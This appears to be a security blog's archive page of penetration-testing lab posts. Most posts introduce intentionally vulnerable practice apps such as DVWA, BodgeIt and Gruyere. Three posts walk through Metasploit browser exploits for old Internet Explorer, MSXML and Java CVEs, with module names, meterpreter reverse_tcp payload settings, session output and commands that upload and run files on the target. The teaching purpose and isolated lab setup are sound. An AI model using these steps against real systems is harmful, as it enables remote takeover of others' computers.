Showing posts with label PenTesting Labs. Show all posts
Showing posts with label PenTesting Labs. Show all posts

Tuesday, December 17, 2013

BTS PenTesting Lab - a vulnerable web application to learn common vulnerabilities


The most common question from students who is learning website hacking techniques is "how to test my skills legally without getting into troubles?". Here is solution for you guys, you can learn web application Pentesting with our New app "BTS Pentesting Lab".


BTS PenTesting Lab is a vulnerable web application that allows you to learn from basic to advanced  vulnerability techniques.

Currently, the app contains following vulnerability types:

  • SQL Injection
  • Cross Site scripting(XSS)
  • Cross Site request Forgery(CSRF)
  • Clickjacking
  • Server Side Request Forgery(SSRF))
  • File Inclusion(RFI and LFI)
  • Remote Code Execution

Download the latest version of BTS Lab
https://sourceforge.net/projects/btslab/files/latest/download


How to run BTS PenTesting Lab?
1. Install XAMPP or WAMPP in your machine
2. Extract the zip file into the htdocs folder (make sure to rename the folder to "btslab").
3.  Open the "http://localhost/btslab/setup.php" url in your browser.
4. Click the Setup.

That's all Now you can start to use the app at "http://localhost/btslab" :)

In next update, i will add more vulnerability types and advanced techniques.  My next articles will be based on this app :)
Continue   Reading>>

Wednesday, June 20, 2012

CVE-2012-1889: Microsoft XML Core Services Vulnerability Metasploit Demo


CVE-2012-1889: Microsoft XML Core Services Vulnerability
A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.

An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.

The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list.

The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not.

Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole".

Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set lhost 192.168.56.10

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Type "exploit" in the console.


Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] msxml_get_definition_code_exec - Using msvcrt ROP

[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 192.168.56.12

[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Type "sysinfo" in the meterpreter to get the system information.
Continue   Reading>>

CVE-2012-1875 : Hacking windows using MS12-037 Internet Explorer Same ID Vulnerability


Hi, Today i am going to explain how to hack the Windows system using the recent IE exploit.  This article is intend to educate PenTesters.  If you don't know what Penetration testing means, then please reads this article.  Also please read the previous articles on Pen Testing.

CVE-2012-1875 : MS12-037 Internet Explorer Same ID Vulnerability
Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

Two technologies in modern OS are used to make exploits of this sort harder: DEP (data execution prevention) and ASLR (address-space layout randomisation).

DEP is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow. (wiki)

ASLR loads software modules such as DLLs into memory at randomised locations. Moving system DLLs around makes it harder for hackers to guess where to find the library functions they need, such as URLDownloadToFile() and CreateProcess().

But DEP and ASLR don't make remote code execution attacks impossible -just trickier.

In the case of CVE-2012-1875, ASLR can be bypassed by trying to force Internet Explorer to find and load an old version of the Microsoft C runtime DLL - one which was compiled before ASLR become the norm, and
therefore doesn't support it. Whenever you load a non-ASLR DLL, even into an ASLR-enabled program, you can predict where it will end up.

And DEP is bypassed using a technique known as ROP, or return-oriented programming.

Exploit for the Internet Explorer Same ID Vulnerability (CVE-2012-1875 ):


Requirements:
  • Target OS: XP3
  • Attacker OS : Backtrack or any PenTesting Distros
As usual , you have to create two VMs in your VirtualBox.

Preparing victim system:
Install the XP3 in one of the VM.  Change the VM's Network adapter to the Host-only-adapter. (if you don't know what i am talking about, then please use this Virtualbox manual)

Preparing the Attacker system:
Update the Metasploit modules by entering the following command in Terminal:
msfupdate

Or you can download the 'ms12_037_same_id.rb' module and paste in this directory "/opt/metasploit/msf3/modules/exploits/windows/browser/"

Configuring settings for the exploit in Metasploit:
Open the Terminal and type "msfconsole" to get the Metasploit console.

Type " use exploit/windows/browser/ms12_037_same_id" in the console.

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Ok, let us launch the exploit.

Type "exploit" in the console.


Now the exploit is started. Our exploit is running at "http://192.168.56.10:8080/".

Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] Client requesting: /
[*] Using JRE ROP
[*] Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1685)

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.

Now , You can control the victim system from computer using meterpreter.

For example:

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Continue   Reading>>

Sunday, May 13, 2012

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507




Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).
About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...
Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:
  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.
I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:



Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST. 

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine. 
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me.
Continue   Reading>>

Friday, February 3, 2012

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?


Hi BTS readers,  We have provide you plenty of Ethical hacking and Pentesting tutorial, still more article is going to come.  Meanwhile, i like to teach you how to set up your own Pen Testing/ hacking network Lab.

Use of your own Pen Testing Lab:
  • Free, free ,free..! It's free lab, because it is yours..
  • Only one system is enough
  • can Practice your pentesting/hacking skills 
  • can install any kind of malwares(spyware,trojan) or RATs and test how it works
  • and more ...
is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually .  Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system . 

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will you explain everything about Virtualbox and how to setup Guest OS.

I hope you now familiar with installing Guest OS.

Set Up your Target system:
Now we have to set up the target system.  Install the Windows XP in VirtualBox using the xp.iso file.  After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:
Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools .  We will hack the target system using this backtrack.

Network Settings for Guest Os:
Step 1:
click the File menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network

Step2:

Right click on the Guest OX(eg:xp,backtrack) and select the Settings.
Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"
Do the same thing for both Guest OS.

Step 3:


Now run the both guest os .
Finding the IP address of Target System:
open the Windows XP Guest OS window.
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101
Hacking with Pen Testing System:
open the Terminal  and type "nmap 192.168.56.101".
Now it will show the list of open port.

You can hack the target system with open ports.
Let me explain more details in my next article.

If you have trouble in installing or confused, comment here.  
Continue   Reading>>

Sunday, January 29, 2012

Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability


So far i have provided few Web Application Pen Testing tutorials .  Now it is time to for practicing your hacking / pentesting skills in legal way. Last time , i explained about the Damn Vulnerable  Web Application(DVWA). 

Now, i've come with different web application that will help you to improve your knowledge in web app pentesting.

The BodgeIt Store
Like DVWA, This is also a Vulnerable web Application that will help you to develop your skills in Pen testing.

With this Vulnerable Application , you can practice the Following attacks:
  • Cross Site Scripting (XSS)
  • SQL injection (SQLi)
  • Hidden (but unprotected) content
  • Cross Site Request Forgery
  • Debug code
  • Insecure Object References
  • Application logic vulnerabilities
There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not.

How to setup the Pen Testing Lab?


Requirements:
Download the bodgeit.1.3.0.zip file and extract the zip file . Now you will get a WAR file(bodgeit.WAR).

step 1:Install the Tomcat
Install the Tomcat in your system.  If you don't know how to do install the tomcat , do google search.

Step 2: Start the server
Start the tomcat server.

In Ubuntu, type the following command in Terminal:
 sudo /etc/init.d/tomcat6 start
For windows users, just click the tomcat server in all programs.

Step 3:
Open the browser and type "localhost:8080". It will show a page "It works !".   There you can access the manager webapp(http://localhost:8080/manager/html) page.  Clicking the link will ask to enter the username and password.  enter your computer username and password.

Step 4:
Now you are in "Tomcat Web Application Manager" page.  Scroll down and there you can see the WAR file to deploy form.

Step 5: Deploying the WAR
click the Browse button and select the bodgeit.WAR file .  Now click the Deploy button.



Yes,  Now the Application successfully installed..

Access the BodgeIt in this location: http://localhost:8080/bodgeit/


Continue   Reading>>

Sunday, December 25, 2011

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking



I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way.

Download this web Application from here:
http://www.dvwa.co.uk/

For Installing the this application, you will need XAMPP server.

The installation procedure :


Using this application , you can also practice:

  • LFI /RFI (File Inclusion methods)
  • Command Execution
  • Upload Script
  • Login Brute Force
if you have any doubts, check their wiki page or comment here.
Continue   Reading>>

Thursday, November 24, 2011

Free Lab to practice Hacking , Penetration Testing provided by OWASP


Are you interested to learn the following things and test your Security Testing skills? OWASP launched it academy project. It is now available in https://www.hacking-lab.com/

It provide a large set of Online Security Challenges. Increase your skill level with hands-on experience in the field of Network Security, Penetration Testing, Web Application Security, Unix Security, Windows Security, Reverse Engineering, Forensics and more.

How does it work?

  • Register a Hacking-Lab account
  • Join the OWASP TOP 10 classroom (register here)
  • Read the OWASP TOP 10 challenge description
  • Get the Hacking-Lab LiveCD ISO or VirtualBox appliance (or OpenVPN config ZIP)
  • Establish an OpenVPN connection into the Hacking-Lab's vulnerable network
  • Solve the OWASP TOP 10 challenges (OpenVPN is required to access the vulnerable servers)
  • Submit your solution once you are done
  • OWASP GEC will then evaluate your submissions. You will receive points in case of success.
  • Start with the next challenge until you have fully completed the OWASP security challenges
You can find tutorials here:
https://www.hacking-lab.com/tutorial/

This is what exactly i expect. Hope this well help to improve Our Penetration Testing Skills. Enjoy friends..! Use the opportunity to learn penetration Testing and try to get job in good company as a Pen Tester.

Continue   Reading>>

Sunday, October 9, 2011

Learn Web Application Exploits and Defenses for free~Penetration Testing


Are you willing to Learn Web Application Exploitation and Defense against that? Here is the chance for you.   Google Labs provides a Lab to learn Web Application for free of cost.


Penetration Testing :
  • Learn how hackers find security vulnerabilities!
  • Learn how hackers exploit web applications!
  • Learn how to stop them! 
This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:
  • How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
  • How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.
To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

Gruyere 
This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking. In black box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view http headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests. In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code. You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

They'll tag each challenge to indicate which techniques are required to solve them: 

Challenges that can be solved just by using black box techniques.

Challenges that require that you look at the Gruyere source code.

Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

WARNING: 
Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 

Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com